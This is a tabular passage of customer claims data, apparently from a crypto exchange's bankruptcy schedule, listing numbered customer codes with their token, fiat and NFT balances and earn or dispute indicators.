| 07377817 | | CUSDT[1], DOGE[237.80000021], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377818 | | CUSDT[3], USD[0.00] | | |
| 07377821 | | BCH[0], BTC[0], CUSDT[1], DOGE[2], USD[0.01] | | |
| 07377822 | | USD[20.00] | | |
| 07377823 | | USD[10.00] | | |
| 07377825 | | BRZ[162.10621361], BTC[.00117826], CAD[24.50], CUSDT[6], DOGE[242.94074954], ETH[.02483992], ETHW[.02483992], TRX[189.46188731], USD[0.00] | | |
| 07377826 | | USD[10.00] | | |
| 07377827 | | USD[10.00] | | |
| 07377828 | | USD[10.00] | | |
| 07377829 | | DOGE[1.00088546], USD[0.01] | | |
| 07377831 | | USD[20.00] | | |
| 07377832 | | BRZ[1], CUSDT[1], DOGE[10254.36615531], TRX[1], USD[0.00] | Yes | |
| 07377834 | | USD[10.00] | | |
| 07377835 | | DOGE[100.83728146], USD[10.80] | | |
| 07377836 | | BAT[1], BRZ[1], BTC[.00000604], CUSDT[6], DOGE[145.28046587], TRX[4], USD[0.01], USDT[1] | | |
| 07377838 | | USD[10.00] | | |
| 07377839 | | DOGE[2743.62570413], USD[0.00] | | |
| 07377840 | | CUSDT[10], TRX[2], USD[0.77] | | |
| 07377841 | | USD[10.00] | | |
| 07377842 | | USD[10.00] | | |
| 07377843 | | USD[10.00] | | |
| 07377844 | | USD[10.00] | | |
| 07377845 | | CUSDT[1], DOGE[323.14899522], ETH[.04185367], ETHW[.04185367], USD[3.29] | | |
| 07377846 | | DOGE[28711.50671414], SHIB[4247607.71969072], USD[0.00], USDT[0] | Yes | |
| 07377847 | | USD[50.00] | | |
| 07377848 | | BRZ[1], CUSDT[5], DOGE[1430.76125046], ETH[.02437439], ETHW[.02407343], LTC[.86495772], TRX[5], USD[0.00] | Yes | |
| 07377849 | | LINK[.996], SOL[36.858], UNI[.996], USD[14.93] | | |
| 07377850 | | DOGE[199.86151781], USD[10.00] | | |
| 07377851 | | USD[0.01], USDT[0] | | |
| 07377852 | | USD[10.00] | | |
| 07377853 | | USD[10.00] | | |
| 07377854 | | USD[0.00] | | |
| 07377855 | | BRZ[2], CUSDT[1], SHIB[2], USD[0.00] | | |
| 07377856 | | BRZ[1], CUSDT[1], DOGE[2523.17662886], GRT[1], USD[0.83] | | |
| 07377857 | | DOGE[133.99923486], USD[0.00] | Yes | |
| 07377858 | | TRX[.00709278], USD[0.00] | Yes | |
| 07377859 | | USD[10.00] | | |
| 07377860 | | CUSDT[1], DOGE[532.80127585], USD[0.00] | | |
| 07377861 | | CUSDT[1], DOGE[849.75253506], USD[0.00] | | |
| 07377862 | | DOGE[1.56969357], USD[0.00] | | |
| 07377863 | | USD[10.00] | | |
| 07377864 | | BAT[.00096097], BTC[0], GRT[0.00000001], PAXG[0], USD[0.00] | | |
| 07377865 | | BTC[.00462578], DOGE[811.31679968], ETH[.05101295], ETHW[.05101295], SHIB[5530270.88141198], TRX[151.89409077], USD[0.33] | | |
| 07377866 | | USD[10.00] | | |
| 07377868 | | USD[0.01] | | |
| 07377870 | | DOGE[15.77433139], USD[0.00] | | |
| 07377871 | | BRZ[1], CUSDT[1], DOGE[144499.08797244], GRT[1.00296293], LINK[10.32144742], TRX[3], USD[101.52], USDT[0] | Yes | |
| 07377872 | | BTC[.00614041], CUSDT[1], DOGE[306.89147819], TRX[553.38950168], USD[5.55], USDT[25.3390344] | Yes | |
| 07377873 | | USD[10.00] | | |
| 07377874 | | USD[10.00] | | |
| 07377875 | | USD[10.00] | | |
| 07377876 | | BRZ[1], CUSDT[3], DOGE[1358.70315968], GRT[2], SUSHI[1], TRX[3], UNI[1], USD[0.00] | | |
| 07377877 | | BRZ[1], CUSDT[2], DOGE[0], ETH[.01658283], ETHW[.01658283], USD[0.00] | | |
| 07377878 | | USD[0.00] | | |
| 07377879 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07377880 | | USD[10.00] | | |
| 07377881 | | BAT[.81065379], CUSDT[1], DOGE[1.71876587], TRX[2], USD[0.00] | | |
| 07377882 | | DOGE[1.96942072], USD[0.00] | Yes | |
| 07377883 | | BRZ[2], CUSDT[7], DOGE[3007.14537494], TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377884 | | BCH[.00000001], CUSDT[7], DOGE[4707.56939927], LTC[.10036321], TRX[2], USD[0.01] | | |
| 07377885 | | USD[0.00] | | |
| 07377886 | | USD[10.00] | | |
| 07377887 | | DOGE[134.9203201], USD[0.00] | | |
| 07377888 | | USD[10.00] | | |
| 07377890 | | USD[10.00] | | |
| 07377891 | | CUSDT[1], ETH[.01244106], ETHW[.01244106], LTC[.1310556], SOL[2.51571584], SUSHI[.68672256], USD[0.00] | | |
| 07377892 | | CUSDT[1], DOGE[552.68008709], USD[0.00] | Yes | |
| 07377894 | | BTC[0], CUSDT[1], DOGE[.67039128], USD[0.00] | | |
| 07377895 | | CUSDT[2], DOGE[354.78158243], SHIB[567040.56643119], TRX[.00000454], USD[0.00] | Yes | |
| 07377896 | | ETH[0] | | |
| 07377898 | | USD[10.00] | | |
| 07377899 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.01], USDT[0], YFI[0] | | |
| 07377900 | | DOGE[1.01448437], GBP[0.00], USD[0.00] | | |
| 07377901 | | DOGE[3.71235017], USD[0.00], USDT[0] | Yes | |
| 07377902 | | USD[11.10] | Yes | |
| 07377903 | | USD[10.00] | | |
| 07377904 | | USD[10.41] | Yes | |
| 07377905 | | BTC[.00182674], ETH[.06889909], ETHW[.06889909], USD[0.00] | | |
| 07377906 | | USD[0.00] | | |
| 07377907 | | BAT[1], BRZ[1], CUSDT[1], TRX[1], USD[0.00] | | |
| 07377908 | | DOGE[132.7789899], USD[0.00] | | |
| 07377909 | | USD[10.00] | | |
| 07377910 | | CUSDT[1], DOGE[190.25639903], USD[0.00] | | |
| 07377911 | | USD[10.00] | | |
| 07377912 | | CUSDT[1], DOGE[221.04456716], USD[0.01] | | |
| 07377913 | | USD[10.00] | | |
| 07377914 | | USD[10.00] | | |
| 07377915 | | CUSDT[1], DOGE[3720.06572079], USD[10.00] | | |
| 07377916 | | USD[0.72] | | |
| 07377917 | | USD[0.00] | | |
| 07377918 | | CUSDT[1], USD[0.00] | | |
| 07377919 | | LTC[.0061896], USD[15.00] | | |
| 07377920 | | DOGE[595.41367138], TRX[1], USD[10.00] | | |
| 07377921 | | USD[10.00] | | |
| 07377922 | | USD[10.00] | | |
| 07377923 | | USD[10.00] | | |
| 07377924 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07377925 | | BRZ[2], CUSDT[7], DOGE[11979.40713069], LINK[4.00819214], SHIB[1], TRX[2], USD[0.00] | | |
| 07377926 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07377927 | | BAT[1], CUSDT[1], DOGE[187.58358652], USD[2.69], USDT[0] | | |
| 07377928 | | CUSDT[2], DOGE[171.3968522], USD[0.00] | | |
| 07377929 | | BRZ[1], CUSDT[5], DOGE[0], ETH[0.41240898], ETHW[0.41223189], GRT[1.00367791], TRX[4], USD[0.00] | Yes | |
| 07377930 | | USD[0.01] | | |
| 07377931 | | USD[10.00] | | |
| 07377932 | | USD[10.00] | | |
| 07377933 | | BRZ[2], CUSDT[16], DOGE[6965.22697772], TRX[1], USD[0.00] | | |
| 07377934 | | USD[10.00] | | |
| 07377935 | | DOGE[135.03708726], USD[0.00] | | |
| 07377936 | | CUSDT[6], DOGE[137.05019577], TRX[1], USD[0.40] | Yes | |
| 07377937 | | DOGE[.0832023], LINK[0], USD[0.00] | | |
| 07377938 | | USD[10.00] | | |
| 07377939 | | DOGE[33.09452434], USD[0.00] | | |
| 07377940 | | CUSDT[4], USD[0.00] | | |
| 07377941 | | BAT[0], BTC[0], DOGE[0], GRT[0], USD[6.77] | Yes | |
| 07377942 | | BRZ[0], BTC[0], DAI[0], DOGE[0], GRT[0], LINK[0], MATIC[0], SOL[0], TRX[.47560076], USD[0.00], USDT[0] | Yes | |
| 07377943 | | TRX[177.16257483], USD[0.00] | | |
| 07377944 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377945 | | USD[10.00] | | |
| 07377946 | | DOGE[32.15714901], USD[0.15] | | |
| 07377947 | | BCH[.01860319], CUSDT[9], DOGE[0], ETH[.01093619], ETHW[.01079939], MATIC[71.45363353], SHIB[1], SOL[9.86372956], SUSHI[.65347515], TRX[3], USDT[0] | Yes | |
| 07377948 | | USD[10.00] | | |
| 07377950 | | USD[10.00] | | |
| 07377951 | | USD[10.00] | | |
| 07377952 | | USD[10.00] | | |
| 07377953 | | BRZ[2], CUSDT[4], DOGE[3.20481006], USD[0.90] | | |
| 07377954 | | USD[10.00] | | |
| 07377955 | | BAT[1], CUSDT[6], DOGE[780.17530865], SHIB[11], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07377958 | | BRZ[0], BTC[0], CUSDT[1], DOGE[0], LTC[0], TRX[0], USD[0.01] | | |
| 07377960 | | USD[10.00] | | |
| 07377961 | | CUSDT[5], DOGE[280.6799567], USD[0.02] | | |
| 07377962 | | SOL[1.20391786], USD[0.00] | Yes | |
| 07377963 | | BAT[6.2049633], CUSDT[15], DOGE[16.12100522], GRT[.94599359], TRX[2], USD[0.00] | Yes | |
| 07377964 | | DOGE[0], ETH[0], USD[0.00] | | |
| 07377965 | | GRT[3.48494795], USD[2.50] | | |
| 07377966 | | USD[10.00] | | |
| 07377967 | | SOL[.07273756], USD[450.14], USDT[173.49596540] | | |
| 07377968 | | DOGE[123.47121034], USD[0.00] | | |
| 07377969 | | CAD[9.97], SHIB[6088302.85993325], TRX[33.92248204], USD[0.00] | | |
| 07377970 | | USD[10.00] | | |
| 07377971 | | USD[10.00] | | |
| 07377972 | | DOGE[174.47339652], USD[15.00] | | |
| 07377973 | | BAT[1], CUSDT[2], DOGE[3], TRX[1.00002579], USD[0.01] | | |
| 07377974 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07377975 | | BTC[.00094078], DOGE[961.90022114], ETH[.01699191], ETHW[.0167855], SHIB[644981.11090988], UNI[.45726817], USD[0.03] | Yes | |
| 07377976 | | DOGE[166.57291387], USD[0.00] | | |
| 07377977 | | DOGE[21.78491638], TRX[259.82462561], USD[140.83] | | |
| 07377978 | | DOGE[0], USD[0.00] | Yes | |
| 07377980 | | CUSDT[2], USD[19.36] | | |
| 07377981 | | ETH[.0041397], ETHW[.0041397], USD[0.00] | | |
| 07377983 | | DOGE[140.24354413], USD[0.00] | | |
| 07377984 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07377986 | | BRZ[1], CUSDT[1], DOGE[3], SHIB[1], TRX[3], USD[0.69] | | |
| 07377987 | | BRZ[1], BTC[.00011353], DOGE[229.93852478], GRT[12.09376928], USD[0.00] | | |
| 07377988 | | DOGE[26.11226122], USD[0.00] | | |
| 07377989 | | DOGE[1345.38712074], USD[0.00] | Yes | |
| 07377992 | | DOGE[93.32085487], LTC[0], USD[0.00] | | |
| 07377993 | | USD[10.00] | | |
| 07377994 | | USD[10.00] | | |
| 07377995 | | BAT[1.63496728], BRZ[20.71345625], BTC[.00013944], CUSDT[225.29237932], DOGE[2229.97076199], ETH[.00256389], ETHW[.00253653], GRT[16.09400646], KSHIB[991.03875306], SHIB[7077984.1636244], SOL[.28035212], TRX[5403.53823183], USD[0.00], USDT[3.10035385] | Yes | |
| 07377996 | | USD[10.00] | | |
| 07377997 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07377998 | | CUSDT[1], USD[0.00] | | |
| 07377999 | | USD[10.00] | | |
| 07378000 | | AVAX[0], BTC[.916093], ETH[0], ETHW[0.99994186], GRT[26.39438595], MATIC[0], MKR[0], SOL[0], USD[0.00], USDT[0], YFI[0] | | GRT[26.343261] |
| 07378001 | | DOGE[1233.56569172], TRX[1], USD[10.00] | | |
| 07378002 | | BRZ[1], BTC[0], CUSDT[2], DOGE[1], TRX[6], USD[373.31] | | |
| 07378003 | | BAT[2], BRZ[1], CUSDT[13], DOGE[1], TRX[2], USD[0.00] | | |
| 07378005 | | USD[10.00] | | |
| 07378006 | | CUSDT[1], DOGE[1198.29578373], USD[10.00] | | |
| 07378007 | | USD[10.00] | | |
| 07378008 | | CUSDT[1], DOGE[2], TRX[2], USD[0.00] | | |
| 07378009 | | BRZ[2], CUSDT[1], DOGE[3430.16472123], TRX[1], USD[10.00] | | |
| 07378010 | | CUSDT[1], USD[0.01] | | |
| 07378011 | | DOGE[126.43211234], USD[0.00] | | |
| 07378012 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378013 | | USD[10.00] | | |
| 07378014 | | USD[10.00] | | |
| 07378015 | | USD[0.00] | | |
| 07378016 | | CUSDT[4], DOGE[1739.15036957], TRX[67.48963527], USD[0.01] | | |
| 07378017 | | BRZ[3], CUSDT[6], DOGE[22373.38588358], TRX[4], USD[0.57], USDT[1] | | |
| 07378018 | | BTC[.00222994], CUSDT[2], DOGE[1], USD[0.00] | | |
| 07378019 | | USD[0.00], USDT[0] | | |
| 07378020 | | BRZ[1], CUSDT[32], LINK[.00095369], USD[0.00], USDT[1] | | |
| 07378021 | | USD[10.00] | | |
| 07378022 | | ETH[.00564833], ETHW[.00564833], USD[0.00] | | |
| 07378023 | | DOGE[.0000389], USD[0.00] | | |
| 07378024 | | USD[10.00] | | |
| 07378025 | | KSHIB[1452.15441629], SHIB[1255157.53164805], TRX[1], USD[0.00] | Yes | |
| 07378026 | | BAT[1], CUSDT[5], DOGE[1182.77243648], TRX[1], USD[0.00] | | |
| 07378027 | | BRZ[1], CUSDT[3], DOGE[471.09587283], ETH[3.03446495], ETHW[3.03319048], TRX[2], USD[0.00] | Yes | |
| 07378028 | | USD[10.00] | | |
| 07378029 | | BTC[.00015528], USD[0.00] | | |
| 07378030 | | CUSDT[2], ETH[.00503071], ETHW[.00503071], USD[0.00] | | |
| 07378031 | | USD[20.00] | | |
| 07378032 | | USD[10.00] | | |
| 07378033 | | USD[10.00] | | |
| 07378034 | | USD[10.00] | | |
| 07378035 | | CUSDT[3], ETH[.10977905], ETHW[.10977905], USD[0.00] | | |
| 07378036 | | CUSDT[3], DOGE[555.3571522], USD[0.00] | | |
| 07378037 | | CUSDT[2], DOGE[5.88149989], TRX[61.85797877], USD[2.38] | | |
| 07378038 | | BTC[0], TRX[1], USD[0.01] | | |
| 07378039 | | USD[10.00] | | |
| 07378040 | | CUSDT[2], SHIB[441588.11767075], TRX[1], USD[0.00] | Yes | |
| 07378041 | | BAT[1], CUSDT[1], LINK[0], TRX[3], USD[0.00] | Yes | |
| 07378043 | | CUSDT[7], USD[0.00] | | |
| 07378044 | | CUSDT[2], USD[38.26] | | |
| 07378046 | | DOGE[419.68182373], TRX[1], USD[0.91] | | |
| 07378047 | | USD[10.00] | | |
| 07378048 | | USD[10.00] | | |
| 07378049 | | CUSDT[3], DOGE[858.56311403], TRX[1], USD[0.00] | | |
| 07378050 | | CUSDT[5], DOGE[110.53822933], TRX[98.70071591], USD[0.00] | Yes | |
| 07378051 | | CUSDT[2], USD[0.00] | | |
| 07378052 | | BAT[4.81536341], BCH[1.03955543], BRZ[59.51723568], BTC[.00257365], CUSDT[258.00209415], DOGE[2586.45585813], ETH[1.01060147], ETHW[1.01060147], GRT[4], LINK[4.02047113], LTC[1.03209004], PAXG[.03383955], SGD[72.86], SOL[19.98407758], SUSHI[6.82141678], TRX[2802.94893813], USD[0.44], USDT[1.38114171] | | |
| 07378053 | | USD[10.00] | | |
| 07378054 | | USD[10.00] | | |
| 07378055 | | USD[10.00] | | |
| 07378057 | | DOGE[2682.94216702], USD[0.00] | Yes | |
| 07378058 | | USD[10.00] | | |
| 07378059 | | USD[10.00] | | |
| 07378060 | | USD[0.00] | | |
| 07378061 | | USD[0.00] | | |
| 07378062 | | SUSHI[.69352969], USD[0.00] | | |
| 07378063 | | DOGE[135.16242333], USD[0.00] | | |
| 07378064 | | USD[0.00], USDT[0] | Yes | |
| 07378065 | | USD[10.00] | | |
| 07378066 | | USD[10.00] | | |
| 07378067 | | CUSDT[1], DOGE[2], ETH[0.00000012], ETHW[0.00000012], NFT [326624644651922750/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #54][1], NFT [375579523608963058/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #53][1], NFT [413839433836031666/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #30][1], NFT [426484461996044761/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #30][1], NFT [440735754996261345/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #21][1], SUSHI[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07378068 | | USD[10.00] | | |
| 07378069 | | CUSDT[1], USD[0.01] | | |
| 07378070 | | AUD[0.00], BAT[0], BCH[0], BTC[0], CAD[0.00], DAI[0], DOGE[0], ETH[0], ETHW[0], GBP[0.00], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07378071 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378072 | | USD[0.00] | | |
| 07378073 | | USD[0.00] | | |
| 07378074 | | USD[10.00] | | |
| 07378075 | | BRZ[1], CUSDT[1], GRT[1], SUSHI[1], TRX[3], USD[0.00] | | |
| 07378076 | | CUSDT[1], DOGE[365.94284492], KSHIB[490.38296727], SHIB[471978.56920961], SOL[.08119108], USD[0.00], USDT[0] | | |
| 07378077 | | USD[10.00] | | |
| 07378078 | | USD[10.00] | | |
| 07378079 | | USD[10.00] | | |
| 07378080 | | USD[10.00] | | |
| 07378081 | | DOGE[1.00004333], USD[0.00] | | |
| 07378082 | | USD[10.00] | | |
| 07378083 | | BTC[0.00006901], DOGE[.4962], SHIB[1300000], USD[1.37] | | |
| 07378084 | | BTC[0], USD[0.26] | Yes | |
| 07378086 | | USD[10.00] | | |
| 07378087 | | DOGE[191.89388419], USD[0.00] | | |
| 07378088 | | USD[10.00] | | |
| 07378089 | | CUSDT[23857.92580589], DOGE[24405.06551539], TRX[2], USD[0.00] | | |
| 07378090 | | DOGE[139.92095371], USD[0.00] | Yes | |
| 07378091 | | USD[10.00] | | |
| 07378092 | | DOGE[.02406337], SUSHI[.09565903], USD[4.80], USDT[0] | Yes | |
| 07378093 | | BRZ[1], DOGE[.02277079], TRX[15.38679134], USD[0.00], USDT[0] | | |
| 07378094 | | BF_POINT[300] | | |
| 07378095 | | BF_POINT[200], CUSDT[7], USD[0.00] | Yes | |
| 07378096 | | BTC[.00021214], CUSDT[1], DOGE[335.39333309], TRX[1], USD[0.00] | Yes | |
| 07378097 | | CUSDT[2], DOGE[910.182234], USD[209.04] | | |
| 07378098 | | USD[10.00] | | |
| 07378099 | | DOGE[35.24581843], USD[0.00] | | |
| 07378100 | | USD[10.00] | | |
| 07378101 | | BTC[.00155642], CUSDT[2], DOGE[91.87758857], ETH[.02431421], ETHW[.02401325], GRT[33.75263339], TRX[438.85711909], USD[0.66] | Yes | |
| 07378102 | | BRZ[1], DOGE[2], ETH[0.03391920], ETHW[0.03391920], USD[100.00] | | |
| 07378103 | | BAT[.000034], BCH[0], BRZ[3], CUSDT[7], DOGE[5.08375274], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.01] | Yes | |
| 07378104 | | USD[10.00] | | |
| 07378105 | | USD[0.01] | | |
| 07378106 | | USD[10.00] | | |
| 07378107 | | USD[10.00] | | |
| 07378108 | | CUSDT[1], DOGE[134.25145216], USD[0.00] | | |
| 07378109 | | BTC[.0001723], DOGE[255.30826815], TRX[1], USD[0.00] | | |
| 07378110 | | CUSDT[1], DOGE[177.19447092], USD[0.00] | | |
| 07378111 | | BTC[.00159758], CUSDT[3], DOGE[575.81242235], ETH[.03047806], ETHW[.03047806], SOL[2.04710911], TRX[1], USD[0.00] | | |
| 07378112 | | SUSHI[.61372385], USD[0.00] | | |
| 07378113 | | USD[0.00] | | |
| 07378114 | | DOGE[512.36676809], SHIB[4], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07378115 | | USD[10.00] | | |
| 07378116 | | USD[10.00] | | |
| 07378117 | | USD[10.00] | | |
| 07378118 | | USD[10.00] | | |
| 07378119 | | BRZ[1], CUSDT[10], DOGE[.00000488], TRX[.00045856], USD[0.04] | | |
| 07378120 | | DOGE[.29672423], USD[1.61] | | |
| 07378121 | | USD[10.00] | | |
| 07378122 | | USD[10.00] | | |
| 07378123 | | USD[10.00] | | |
| 07378125 | | BRZ[1], BTC[0], CUSDT[7], DOGE[1], ETH[0], TRX[3.00000400], USD[0.00], USDT[0] | | |
| 07378126 | | DOGE[190.14302368], USD[0.00] | | |
| 07378128 | | USD[10.00] | | |
| 07378129 | | DOGE[0], SOL[0], TRX[0], USD[0.01] | | |
| 07378130 | | DOGE[141.43301343], USD[0.00] | | |
| 07378131 | | CUSDT[2], ETH[0], SHIB[551101.48313397], TRX[1], USD[0.00] | | |
| 07378132 | | DOGE[0.74119613], SOL[.0444985], USD[315.20] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378134 | | CUSDT[5], USD[0.00] | | |
| 07378135 | | USD[10.00] | | |
| 07378136 | | TRX[1], USD[0.01] | | |
| 07378138 | | GBP[0.00], KSHIB[495.33051919], USD[18.75] | Yes | |
| 07378139 | | USD[0.00] | | |
| 07378140 | | DOGE[2292.9521685], USD[10.91] | Yes | |
| 07378141 | | USD[10.00] | | |
| 07378142 | Contingent, Disputed | DOGE[34.96438566], USD[1.10] | Yes | |
| 07378143 | | BTC[.0046501], CUSDT[1], DOGE[2489.1368251], ETH[.24608331], SHIB[3], TRX[3], USD[0.02] | Yes | |
| 07378144 | | BRZ[1], DOGE[6977.69535194], SHIB[1589826.11923688], USD[206.38], USDT[0] | | |
| 07378145 | | BCH[.0143641], CUSDT[2], DOGE[1175.11454098], USD[200.00] | | |
| 07378146 | | CUSDT[8], DOGE[.02392556], TRX[2], USD[0.00], USDT[0] | | |
| 07378147 | | NFT (303106478061866537/Coachella x FTX Weekend 2 #20911)[1], USD[10.00] | | |
| 07378148 | | USD[10.00] | | |
| 07378149 | | DOGE[1], USD[0.00] | | |
| 07378150 | | USD[10.00] | | |
| 07378151 | | CUSDT[1], DOGE[9199.09810191], ETH[.36987189], ETHW[.36971641], SOL[2.10214626], TRX[73.55684953], USD[284.73] | Yes | |
| 07378152 | | USD[10.00] | | |
| 07378153 | | USD[0.08] | | |
| 07378156 | | USD[10.00] | | |
| 07378157 | | DOGE[17.5086145], USD[0.00] | | |
| 07378158 | | USD[10.00] | | |
| 07378159 | | USD[0.00] | | |
| 07378160 | | USD[0.00] | | |
| 07378161 | | AAVE[3.36272664], BRZ[1], BTC[.05967835], CUSDT[5], DOGE[7853.3123293], ETH[1.01910003], ETHW[1.01867202], GRT[14.50604406], KSHIB[1833.17283905], MATIC[87.60965487], PAXG[.07337789], SHIB[1260089.37986974], SOL[13.15730145], TRX[556.10736904], USD[1.09] | Yes | |
| 07378162 | | DOGE[203.66771803], USD[0.13] | | |
| 07378163 | | TRX[1.37064598], USD[0.00] | Yes | |
| 07378164 | | USD[10.00] | | |
| 07378166 | | USD[10.00] | | |
| 07378167 | | CUSDT[2], TRX[125.94204251], USD[0.00] | | |
| 07378168 | | BRZ[1], CUSDT[2], DOGE[43.08377471], TRX[1], USD[0.00] | | |
| 07378169 | | CUSDT[1], DOGE[1], TRX[548.63970692], USD[0.00] | | |
| 07378170 | | SOL[.05538599], USD[0.00] | Yes | |
| 07378171 | | BTC[.00108164], DOGE[236.60300479], USD[15.00] | | |
| 07378172 | | USD[10.00] | | |
| 07378173 | | BCH[.00036509], BTC[.00016533], ETH[.00000011], ETHW[.00000011], SUSHI[.000002], USD[0.00], YFI[.0000634] | | |
| 07378174 | | USD[10.00] | | |
| 07378175 | | CUSDT[1], DOGE[42.48765959], USD[0.00] | | |
| 07378176 | | BRZ[1], DOGE[1.0000121], USD[0.00] | | |
| 07378177 | | USD[0.00] | | |
| 07378178 | | USD[0.00] | | |
| 07378179 | | USD[10.00] | | |
| 07378180 | | DOGE[13.50498994], USD[0.00] | Yes | |
| 07378181 | | DOGE[103.66902099], USD[5.49] | Yes | |
| 07378182 | | CUSDT[1], SUSHI[22.3107647], USD[0.00] | Yes | |
| 07378183 | | DOGE[99.99280158], USD[0.83] | | |
| 07378185 | | BRZ[1], BTC[0], CUSDT[7], DOGE[0], ETH[0], NFT (509019880043119417/Australia Ticket Stub #1223)[1], TRX[4], USD[0.00] | | |
| 07378186 | | USD[0.00] | | |
| 07378187 | | DOGE[1], ETH[.14203487], ETHW[.14203487], USD[0.00] | | |
| 07378188 | | DOGE[.00001171], USD[0.00] | | |
| 07378189 | | BTC[.00000005], USD[0.00] | | |
| 07378190 | | DOGE[27.36899222], USD[0.00] | | |
| 07378191 | | USD[10.00] | | |
| 07378192 | | CUSDT[4], DOGE[187.77533938], USD[0.00] | | |
| 07378193 | | DOGE[100.04232254], USD[0.00], USDT[0] | | |
| 07378194 | | BAT[1.01653995], DOGE[.00039863], GRT[1.00495218], TRX[2], USD[1694.51] | Yes | |
| 07378195 | | USD[10.00] | | |
| 07378196 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07378197 | | DAI[.09057638], DOGE[.1778], GRT[5], USD[0.08], USDT[0.00197525] | | |
| 07378198 | | CUSDT[3], DOGE[6.75180284], USD[0.70] | | |
| 07378199 | | USD[10.00] | | |
| 07378200 | | CUSDT[5], DOGE[1], SHIB[666599.95888462], USD[0.00] | | |
| 07378201 | | USD[10.00] | | |
| 07378202 | | USD[10.00] | | |
| 07378203 | | CUSDT[2606.60343324], DOGE[11604.6363624], GRT[689.71998293], SHIB[2792485.84518109], SUSHI[10.06085753], TRX[1437.28434251], USD[0.00] | Yes | |
| 07378204 | | BRZ[1], CUSDT[3], TRX[1], USD[0.09] | Yes | |
| 07378205 | | BAT[1.0165555], BRZ[1], CUSDT[9], USD[0.00] | Yes | |
| 07378206 | | DOGE[1], TRX[1], USD[0.01], USDT[0] | | |
| 07378207 | | BRZ[1], CUSDT[1], DOGE[957.2599096], TRX[1], USD[5.00] | | |
| 07378208 | | BAT[1, BRZ[1], USD[0.00] | | |
| 07378210 | | USD[10.00] | | |
| 07378211 | | CUSDT[4], USD[0.01] | | |
| 07378213 | | DOGE[215.06977455], USD[0.00] | Yes | |
| 07378214 | | DOGE[160.50794341], USD[0.00] | | |
| 07378215 | | DOGE[4.43703247], USD[0.00] | | |
| 07378216 | | BRZ[1], DOGE[107.95257903], TRX[1], USD[0.80], USDT[0.05109296] | | |
| 07378217 | | GRT[4.25426383], USD[0.00] | | |
| 07378218 | | USD[10.00] | | |
| 07378219 | | BRZ[1], CUSDT[1], DOGE[13020.32252223], USD[0.00] | | |
| 07378220 | | USD[10.00] | | |
| 07378221 | | USD[0.00] | | |
| 07378222 | | USD[10.00] | | |
| 07378223 | | CUSDT[13], DOGE[76.11252826], USD[0.01] | | |
| 07378224 | | DOGE[177.92706475], USD[0.00] | | |
| 07378225 | | USD[10.00] | | |
| 07378226 | | CUSDT[2], DOGE[.49349321], TRX[.09262862], USD[0.01] | | |
| 07378227 | | USD[10.00] | | |
| 07378228 | | BRZ[16.57350691], DOGE[2], ETH[.00545163], ETHW[.00545163], TRX[96.20850673], USD[0.00], YFI[.00031592] | | |
| 07378230 | | USD[10.00] | | |
| 07378231 | | CUSDT[4], DOGE[191.69574166], TRX[3], USD[0.00] | | |
| 07378232 | | BTC[0], SHIB[58220.77317186], USD[0.00] | | |
| 07378233 | | CUSDT[1], TRX[1], USD[47.40] | | |
| 07378235 | | USD[10.00] | | |
| 07378236 | | DOGE[131.73498852], NFT (570938707018204283/Australia Ticket Stub #2317)[1], SHIB[3757546.79089194], TRX[2], USD[10.44], USDT[20.74211163] | Yes | |
| 07378238 | | USD[10.00] | | |
| 07378239 | | CUSDT[2], DOGE[579.22155829], TRX[1], USD[120.64] | | |
| 07378240 | | USD[10.00] | | |
| 07378241 | | BTC[.00007486], CUSDT[1], DOGE[44.98773838], TRX[1], USD[4.22] | | |
| 07378242 | | CUSDT[1], DOGE[97.16662371], USD[0.20] | | |
| 07378243 | | USD[189.27] | | |
| 07378244 | | BRZ[2], BTC[0.00386456], DOGE[0], ETH[0.16608371], ETHW[0.16608371], USD[0.00] | | |
| 07378245 | | USD[10.00] | | |
| 07378246 | | USD[10.00] | | |
| 07378247 | | DOGE[124.10250618], USD[0.00] | | |
| 07378248 | | USD[0.00] | | |
| 07378249 | | DOGE[1], TRX[1], USD[0.01] | | |
